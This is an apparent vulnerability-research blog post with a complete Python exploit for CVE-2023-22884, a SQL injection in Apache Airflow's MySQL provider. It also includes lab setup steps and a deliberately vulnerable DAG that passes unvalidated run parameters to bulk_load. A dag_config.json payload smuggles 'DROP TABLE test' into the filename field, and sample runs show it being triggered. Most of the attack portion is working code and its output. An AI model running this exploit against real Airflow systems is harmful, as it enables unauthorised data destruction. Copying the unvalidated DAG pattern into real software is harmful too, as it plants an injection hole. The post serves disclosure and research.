SQL injection in Apache Airflow MySQL provider (CVE-2023–22884) — PoC + exploit

vsociety
14 min readAug 14, 2023

Summary

Proof of Concept for CVE-2023-22884, a SQL injection vulnerability in the Apache Airflow MySQL provider.

general

1 # @jakabakos
2 # version: 1.1
3 # Tested with Airflow 2.5.0 and MySQL provider 3.4.0
4 # Apache Airflow REST API reference: https://airflow.apache.org/docs/apache-airflow/stable/stable-rest-api-ref.html
5
6 import argparse
7 import json
8 import re
9 import requests
10 from packaging import version
11
def get_csrf_token(url):
    """Fetch the login page and extract the CSRF token and session cookie.

    Args:
        url: Base URL of the Airflow webserver; "/login/" is appended to it.

    Returns:
        A ``(session_cookie, csrf_token)`` tuple. ``session_cookie`` is the
        value of the ``session`` cookie on the login-page response (``None``
        when the response carries no such cookie).

    Prints an error and exits with status 1 when no token can be found.
    """
    login_page = requests.get(url + "/login/")

    # The token is the captured ``value`` attribute of the first matching
    # <input ...> element in the returned HTML.
    token_pattern = r'<input(?:\s+(?:(?:type|name|id)\s*=\s*"[^"]*"\s*)+)?\s+value="([^"]+)">'
    token_match = re.search(token_pattern, login_page.text)

    # The pre-login session cookie is returned alongside the token.
    anonymous_cookie = login_page.cookies.get('session')

    if token_match is None:
        print("[-] CSRF token not found. Exiting...")
        exit(1)

    print("[+] CSRF token found.")
    return anonymous_cookie, token_match.group(1)
32
def login(url, username, password, cookie, csrf_token):
    """Log in to the Airflow web UI and return the authenticated session cookie.

    Args:
        url: Base URL of the Airflow webserver; "/login/" is appended to it.
        username: Airflow username.
        password: Airflow password.
        cookie: Value of the pre-login ``session`` cookie, sent back with the
            login request.
        csrf_token: CSRF token submitted in the login form.

    Returns:
        The value of the cookie found in the ``Set-Cookie`` header of the
        login response.

    Every failure path prints a "[-]" message and exits with status 1, so a
    caller never receives ``None`` and never continues with an unusable
    ``session=None`` cookie.
    """
    response = requests.post(
        url + "/login/",
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": f"session={cookie}",
        },
        data={"csrf_token": csrf_token, "username": username, "password": password},
    )

    if "Invalid login. Please try again." in response.text:
        print("[-] Login was not successful due to invalid credentials.")
        exit(1)

    if response.status_code != 200:
        print("[-] Something went wrong with the login process.")
        exit(1)

    # Header shape is "name=value; attr; ...". Split on the first ";" and the
    # first "=" only, so a cookie value that itself contains "=" stays intact.
    set_cookie = response.headers.get("Set-Cookie", "")
    session_cookie = set_cookie.split(";", 1)[0].partition("=")[2]
    if not session_cookie:
        print("[-] Login response did not contain a session cookie. Exiting...")
        exit(1)

    print(f"[+] Login was successful. Captured session cookie: {session_cookie}")
    return session_cookie
59
def verify_airflow_version(url, session_cookie):
    """Read the Airflow version from the home page and check it against 2.5.0.

    Args:
        url: Base URL of the Airflow webserver; "/home" is appended to it.
        session_cookie: Value sent as the ``session`` cookie.

    Returns normally when the detected version is 2.5.0 or lower. Prints an
    error and exits with status 1 when no version string is found or when the
    version is above 2.5.0.
    """
    home_page = requests.get(
        url + "/home",
        headers={"Cookie": f"session={session_cookie}"},
    )

    # The first "vX.Y.Z" occurrence in the page is taken as the version.
    match = re.search(r'v(\d+\.\d+\.\d+)', home_page.text)
    if match is None:
        print("[-] Airflow version not found.")
        exit(1)

    detected = match.group(1)
    print(f"[+] Airflow version found: {detected}")

    if version.parse(detected) > version.parse("2.5.0"):
        print("[-] Airflow version is not vulnerable. Version is above 2.5.0. Exiting...")
        exit(1)

    print("[+] Version is vulnerable.")
85
def verify_mysql_provider(url, session_cookie):
    """Check that the installed MySQL provider is version 3.4.0 or lower.

    Args:
        url: Base URL of the Airflow webserver.
        session_cookie: Value sent as the ``session`` cookie.

    Returns normally when the provider is present and its version is 3.4.0
    or lower. Prints an error and exits with status 1 when the provider is
    missing from the ``/api/v1/providers`` listing or has a higher version.
    """
    listing = requests.get(
        f'{url}/api/v1/providers',
        headers={"Cookie": f"session={session_cookie}"},
    ).json()

    # Only the first entry with the MySQL provider package name is considered.
    mysql_provider = next(
        (
            entry
            for entry in listing.get("providers", [])
            if entry.get("package_name") == "apache-airflow-providers-mysql"
        ),
        None,
    )

    if mysql_provider is None:
        print("[-] MySQL provider not found. Exiting...")
        exit(1)

    if version.parse(mysql_provider.get("version")) > version.parse("3.4.0"):
        print("[-] MySQL provider version is not vulnerable. Exiting...")
        exit(1)

    print("[+] MySQL provider version is vulnerable.")
    return
110
def _create_connection_from_file(url, headers, path):
    """Create an Airflow connection from the JSON document stored at ``path``.

    Prints an error and exits with status 1 when the file cannot be read or
    parsed, when required keys are missing, or when the API call does not
    answer with HTTP 200.
    """
    try:
        with open(path, "r") as f:
            conn_data = json.load(f)
    except OSError:
        print("[-] Submitted connection id does not exist and no connection data file was found at that path. Exiting...")
        exit(1)
    except (json.JSONDecodeError, UnicodeDecodeError):
        print("[-] Failed to parse the JSON connection data. Exiting...")
        exit(1)

    required_keys = ("connection_id", "conn_type", "host", "login", "port", "password")
    if not isinstance(conn_data, dict) or any(key not in conn_data for key in required_keys):
        print("[-] Invalid JSON format for connection data. Exiting...")
        exit(1)

    # Connections are created through the REST API under the /api/v1 prefix,
    # the same prefix used for listing them.
    response = requests.post(
        f"{url}/api/v1/connections",
        headers=headers,
        json=conn_data,
    )
    if response.status_code != 200:
        print("[-] Failed to create the connection. Exiting...")
        exit(1)

    print(f"[+] Connection was successfully created with name {conn_data['connection_id']}.")
    print("[+] This connection id should be used by the vulnerable DAG.")


def verify_connection_id(url, session_cookie, connection_id):
    """Verify that a MySQL connection exists, or create it from a JSON file.

    ``connection_id`` is first looked up in the ``/api/v1/connections``
    listing. If no connection has that ID, the value is treated as a path to
    a JSON file describing a new connection, which is then created.

    Args:
        url: Base URL of the Airflow webserver.
        session_cookie: Value sent as the ``session`` cookie.
        connection_id: ID of an existing connection, or path to a JSON file
            with the keys ``connection_id``, ``conn_type``, ``host``,
            ``login``, ``port`` and ``password``.

    Returns normally when the connection exists with type "mysql" or was
    created successfully. Every other outcome prints an error and exits with
    status 1, including an empty or missing ``connection_id``.
    """
    # The command-line option is optional, so the value may be None.
    if not connection_id:
        print("[-] No connection id or connection data file was provided. Exiting...")
        exit(1)

    headers = {"Cookie": f"session={session_cookie}"}
    response = requests.get(f"{url}/api/v1/connections", headers=headers)
    connections = response.json().get("connections", [])

    existing = next(
        (conn for conn in connections if conn.get("connection_id") == connection_id),
        None,
    )
    if existing is not None:
        if existing.get("conn_type") != "mysql":
            print("[-] The provided connection_id is not a 'mysql' type connection. Exiting...")
            exit(1)
        print(f"[+] Connection ID '{connection_id}' exists.")
        return

    # No such connection: fall back to interpreting the value as a JSON file.
    _create_connection_from_file(url, headers, connection_id)
167
def verify_dag_id(url, session_cookie, dag_id):
    """Check that ``dag_id`` appears in the ``/api/v1/dags`` listing.

    Args:
        url: Base URL of the Airflow webserver.
        session_cookie: Value sent as the ``session`` cookie.
        dag_id: DAG ID to look for.

    Returns normally when the ID is listed; otherwise prints an error and
    exits with status 1.
    """
    listing = requests.get(
        f'{url}/api/v1/dags',
        headers={"Cookie": f"session={session_cookie}"},
    ).json()

    listed_ids = [entry.get("dag_id") for entry in listing.get("dags", [])]

    if dag_id not in listed_ids:
        print("[-] DAG id does not exist. Exiting...")
        exit(1)

    print(f"[+] DAG id '{dag_id}' exists.")
183
def trigger_dag(url, session_cookie, dag_id, file_path):
    """Trigger a DAG run whose ``conf`` is loaded from a JSON file.

    Args:
        url: Base URL of the Airflow webserver.
        session_cookie: Value sent as the ``session`` cookie.
        dag_id: ID of the DAG to trigger.
        file_path: Path to a JSON file whose parsed content is sent as the
            ``conf`` of the new DAG run.

    Returns normally only when the API answers with HTTP 200 and a run in
    the "queued" state. Every failure prints a "[-]" message and exits with
    status 1, so the caller cannot report success after a failed trigger.
    That covers a missing path, an unreadable file, invalid JSON and a
    rejected request.
    """
    # The command-line option is optional, so the path may be None.
    if not file_path:
        print("[-] No DAG config file was provided. Exiting...")
        exit(1)

    try:
        with open(file_path, "r") as file:
            payload = json.load(file)
    except OSError:
        print("[-] DAG config file not found or not readable. Exiting...")
        exit(1)
    except (json.JSONDecodeError, UnicodeDecodeError):
        print("[-] Failed to parse the DAG config file as JSON. Exiting...")
        exit(1)

    endpoint = f"{url}/api/v1/dags/{dag_id}/dagRuns"
    headers = {
        "Cookie": f"session={session_cookie}",
        "accept": "application/json",
    }
    response = requests.post(endpoint, headers=headers, json={"conf": payload})

    # An error response is not guaranteed to be JSON; fall back to raw text.
    try:
        body = response.json()
    except ValueError:
        body = None

    if (
        response.status_code == 200
        and isinstance(body, dict)
        and body.get("state") == "queued"
    ):
        print("[+] DAG successfully triggered with the provided payload.")
        return

    print("[-] Failed to trigger the DAG. Response:")
    print(json.dumps(body, indent=4) if body is not None else response.text)
    exit(1)
220
def main():
    """Parse the command line and run the script in test or attack mode.

    Test mode checks the Airflow version, the MySQL provider version, the
    connection and the DAG, so it needs ``--connection-id`` and ``--dag-id``.
    Attack mode triggers the DAG with a config file, so it needs ``--dag-id``
    and ``--dag-config-file``. Missing mode-specific options are reported
    through ``parser.error`` (usage message, exit status 2).

    Authentication uses either ``--cookie`` or ``--username`` together with
    ``--password``. Missing credentials or a host URL that does not start
    with "http://" or "https://" print an error and exit with status 1.
    """
    example_text = '''Examples:
  python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
  python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json
'''
    parser = argparse.ArgumentParser(
        description="CVE-2023-22884 Apache Airflow SQLi exploit script",
        epilog=example_text,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )

    parser.add_argument("-u", "--username", help="Airflow username.")
    parser.add_argument("-p", "--password", help="Airflow password.")
    parser.add_argument("-c", "--cookie", help="Authentication cookie.")
    parser.add_argument("--host", required=True, help="Host where the airflow is (format: http(s)://host:port).")
    parser.add_argument("-m", "--mode", required=True, choices=["test", "attack"], help="The mode of the script. Can be: 'test' or 'attack' mode")
    parser.add_argument("-ci", "--connection-id", help="The connection ID of the MySQL provider. Required in test mode. Submit a string if it's existing or a path to a JSON file if should be created.")
    parser.add_argument("-di", "--dag-id", help="The ID of the DAG to be exploited. Required in both modes.")
    parser.add_argument("-dc", "--dag-config-file", help="Path to a file that stores the DAG config JSON. Required in attack mode.")

    args = parser.parse_args()

    # Fail early on missing mode-specific options instead of passing None
    # down to the helpers.
    if args.mode == "test":
        required = {
            "-ci/--connection-id": args.connection_id,
            "-di/--dag-id": args.dag_id,
        }
    else:
        required = {
            "-di/--dag-id": args.dag_id,
            "-dc/--dag-config-file": args.dag_config_file,
        }
    missing = [flag for flag, value in required.items() if not value]
    if missing:
        parser.error(f"{args.mode} mode requires: {', '.join(missing)}")

    if not ((args.username and args.password) or args.cookie):
        print("[-] Either username along with password or the authentication cookie is required. Exiting...")
        exit(1)

    url = args.host.rstrip("/")
    # Match the full scheme prefix; a bare "http" prefix check would also
    # accept values such as "httpx://host".
    if not url.startswith(("http://", "https://")):
        print("[-] Invalid URL format. Please use 'http' or 'https' as the schema. Exiting...")
        exit(1)

    # Without a supplied cookie, log in with the credentials to obtain one.
    session_cookie = args.cookie
    if not session_cookie:
        initial_session_cookie, csrf_token = get_csrf_token(url)
        session_cookie = login(url, args.username, args.password, initial_session_cookie, csrf_token)

    if args.mode == "test":
        print("[+] Running in test mode.")
        verify_airflow_version(url, session_cookie)
        verify_mysql_provider(url, session_cookie)
        verify_connection_id(url, session_cookie, args.connection_id)
        verify_dag_id(url, session_cookie, args.dag_id)

        print("[+] Exploit successfully finished in test mode. Application is potentially VULNERABLE.")
        exit(0)

    elif args.mode == "attack":
        print("[+] Running in attack mode.")
        trigger_dag(url, session_cookie, args.dag_id, args.dag_config_file)
        print("[+] Exploit successfully finished in attack mode.")


if __name__ == "__main__":
    main()

Description

Set up the PoC app

Install Docker and Docker Compose

Follow these instructions:

Install MySQL

To get a MySQL 8 server, follow this writeup:

sudo apt update && sudo apt -y  install wget
wget https://repo.mysql.com//mysql-apt-config_0.8.22-1_all.deb
sudo dpkg -i mysql-apt-config_0.8.22-1_all.deb
sudo apt update
sudo apt install mysql-server

One has to explicitly enable LOAD DATA INFILE functionality in MySQL by setting a variable. The config file on our host machine is located at /etc/mysql/my.cnf. Add this code to the bottom of the file:

[mysqld]
secure-file-priv = ""

Confirm if MySQL 8.0 was installed as expected:

mysql -u root -p

After passing the password you should see your MySQL console:

Let’s create a table for testing purposes:

CREATE DATABASE airflow;
use airflow;
CREATE TABLE test (data varchar(255));

Install, configure, and run Airflow

We want to run Airflow in Docker with a local MySQL server we own.

This docker compose file seems to work but because the affected Airflow version is using a higher MySQL provider package we have to write our custom install command into a Dockerfile. You can find both files here.

Download the file:

curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.5.0/docker-compose.yaml'

Then, uncomment the “build: .” line in the docker-compose.yaml:

---
version: '3'
x-airflow-common:
&airflow-common
# In order to add custom dependencies or upgrade provider packages you can use your extended image.
# Comment the image line, place your Dockerfile in the directory where you placed the docker-compose.yaml
# and uncomment the "build" line below, Then run `docker-compose build` to build the images.
image: ${AIRFLOW_IMAGE_NAME:-apache/airflow:2.5.0}
build: . # UNCOMMENTED LINE HERE
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
AIRFLOW__DATABASE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
# For backward compatibility, with Airflow <2.3
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
AIRFLOW__CORE__FERNET_KEY: ''
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
AIRFLOW__API__AUTH_BACKENDS: 'airflow.api.auth.backend.basic_auth'
_PIP_ADDITIONAL_REQUIREMENTS: ${_PIP_ADDITIONAL_REQUIREMENTS:-}
volumes:
- ./dags:/opt/airflow/dags
- ./logs:/opt/airflow/logs
- ./plugins:/opt/airflow/plugins
user: "${AIRFLOW_UID:-50000}:0"
depends_on:
&airflow-common-depends-on
redis:
condition: service_healthy
postgres:
condition: service_healthy
[REDACTED]

And also add the install command to a Dockerfile located in the same folder as the docker-compose.yaml file.

FROM apache/airflow:2.5.0
RUN pip install apache-airflow-providers-mysql==3.4.0

Additionally, we have to initialize the Airflow environment. As the official tutorial says, “On Linux, the quick-start needs to know your host user id and needs to have group id set to 0. Otherwise, the files created in dags, logs and plugins will be created with root user ownership.” So run the following commands:

mkdir  -p  ./dags  ./logs  ./plugins  ./config
echo -e "AIRFLOW_UID=$(id -u)" > .env

Don’t forget to initialize the database with docker compose up airflow-init.

And now build and run the Airflow:

docker-compose up --build

As a result, you should see in the logs that the webserver and other components are up and there is a login form under localhost:8080:

The default username and password are both airflow.

As a final step here we can check whether the installation of the vulnerable provider version was successful or not with this one-liner:

docker exec -it `docker ps | grep webserver | cut -d " " -f1` bash -c "pip freeze | grep apache-airflow-providers-mysql"

The output should be apache-airflow-providers-mysql==3.4.0.

As a next step, set up a connection for testing purposes under Admin / Connections menu.

Fill in the necessary data to connect to our local MySQL server:

  • Connection Id: mysql
  • Connection type: MySQL
  • Host: localhost
  • Schema: airflow
  • Login: root (can be any other user based on your MySQL configuration)
  • Password: password to connect to MySQL server
  • Port: 3306
  • Extra: {"local_infile": true}

Lastly, unpause the “bulk_load_from_file” DAG from the list.

Set up a DAG

The vulnerable code segment is in the MySQL provider’s bulk_load method, so we need a DAG that is using this method. Let's create one for the proof of concept.

Example DAG that is calling the vulnerable method. This Airflow DAG, named “bulk_load_from_file,” is designed to bulk load data from a file into a MySQL database.

from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python import get_current_context
from airflow.hooks.mysql_hook import MySqlHook

def get_file_name():
    """Return the "filename" run parameter, or "test_file" when it is absent."""
    run_params = get_current_context()["params"]
    return run_params.get("filename", "test_file")
def get_table_name():
    """Return the "table_name" run parameter, or "test_table" when it is absent."""
    run_params = get_current_context()["params"]
    return run_params.get("table_name", "test_table")
def bulk_load_sql(**kwargs):
    """Bulk-load the user-supplied file into the user-supplied table.

    Builds a ``MySqlHook`` for the connection ID "mysql" and calls its
    ``bulk_load`` method with the table name and file name taken from the
    run parameters. ``kwargs`` is accepted but not used.
    """
    hook = MySqlHook(mysql_conn_id='mysql')
    source_file = get_file_name()
    target_table = get_table_name()
    # NOTE: both values are passed through unvalidated; the article identifies
    # the file name as the injection point.
    hook.bulk_load(table=target_table, tmp_file=source_file)
"""Define the DAG"""
# The DAG has no schedule (schedule_interval=None).
dag = DAG(
    "bulk_load_from_file",
    start_date=datetime(2023, 7, 1),
    schedule_interval=None,
)

# Single task that calls bulk_load_sql. ``provide_context`` is not passed:
# Airflow 2 deprecates the argument, ignores it and emits a warning.
t1 = PythonOperator(
    task_id='bulk_load',
    python_callable=bulk_load_sql,
    dag=dag,
)

A high-level overview of the file:

  • get_file_name() and get_table_name() are Python functions defined to retrieve user-supplied parameters "filename" and "table_name" from the context using get_current_context(). If the parameters are not provided, the default values "test_file" and "test_table" are used, respectively.
  • bulk_load_sql(**kwargs) is a Python function that serves as the core task. It uses MySqlHook to establish a connection to the MySQL database with the connection ID "mysql" (assuming it's defined in the Airflow connections). It then calls the bulk_load() method of the MySqlHook, passing the table name obtained from get_table_name() and the filename obtained from get_file_name() to load the content of the file into the specified database table. The injection point is the filename parameter coming from the context.
  • t1 is a PythonOperator that calls bulk_load_sql function that is to be executed when this task is triggered.

Exploitation

See the options of the exploit running with -h.

kali# python3 exploit.py -h
usage: exploit.py [-h] [-u USERNAME] [-p PASSWORD] [-c COOKIE] --host HOST -m {test,attack} [-ci CONNECTION_ID] [-di DAG_ID] [-dc DAG_CONFIG_FILE]
CVE-2023-22884 Apache Airflow SQLi exploit script
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Airflow username.
-p PASSWORD, --password PASSWORD
Airflow password.
-c COOKIE, --cookie COOKIE
Authentication cookie.
--host HOST Host where the airflow is (format: http(s)://host:port).
-m {test,attack}, --mode {test,attack}
The mode of the script. Can be: 'test' or 'attack' mode
-ci CONNECTION_ID, --connection-id CONNECTION_ID
The connection ID of the MySQL provider. Required in attack mode only. Submit a string if it's existing or a path to a JSON file if
should be created.
-di DAG_ID, --dag-id DAG_ID
The ID of the DAG to be exploited. Required in attack mode only.
-dc DAG_CONFIG_FILE, --dag-config-file DAG_CONFIG_FILE
Path to a file that stores a the DAG config JSON.
Examples:
python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json

Test mode

Let’s run our script in test mode first:

kali# python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
[+] CSRF token found.
[+] Login was successful. Captured session cookie: 64a9c813-e006-43e0-9c86-5877d0114491.2TxBJcJw4gH_JBVed5An6Qyu5Bc
[+] Running in test mode.
[+] Airflow version found: 2.5.0
[+] Version is vulnerable.
[+] MySQL provider version is vulnerable.
[+] Connection ID 'mysql' exists.
[+] DAG id 'bulk_load_from_file' exists.
[+] Exploit successfully finished in test mode. Application is potentially VULNERABLE.

Attack mode

Then, in attack mode.

Check the contents of the test table in the airflow MySQL database first:

Create a dag_config.json that will be attached as a JSON config file to the DAG trigger. The malicious code injection is in the filename part:

dag_config.json:

{
"filename": "/tmp/test_file' INTO TABLE test; DROP TABLE test; --",
"table_name": "test"
}

Then, run the script in attack mode:

#  python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json
[+] CSRF token found.
[+] Login was successful. Captured session cookie: c0ffe971-a21a-459d-be71-e938742ebbb2.e80LLzIs5n2PvttPfJIHBPjgIrc
[+] Running in attack mode.
[+] DAG successfully triggered with the provided payload.
[+] Exploit successfully finished in attack mode.

Wait a couple of seconds and then check if the exploit payload was successfully executed:

Tadaaam!

Flowchart diagram

Join vsociety: https://vsociety.io/
Check out our Discord: https://discord.gg/sHJtMteYHQ

--

--

vsociety

vsociety is a community centered around vulnerability research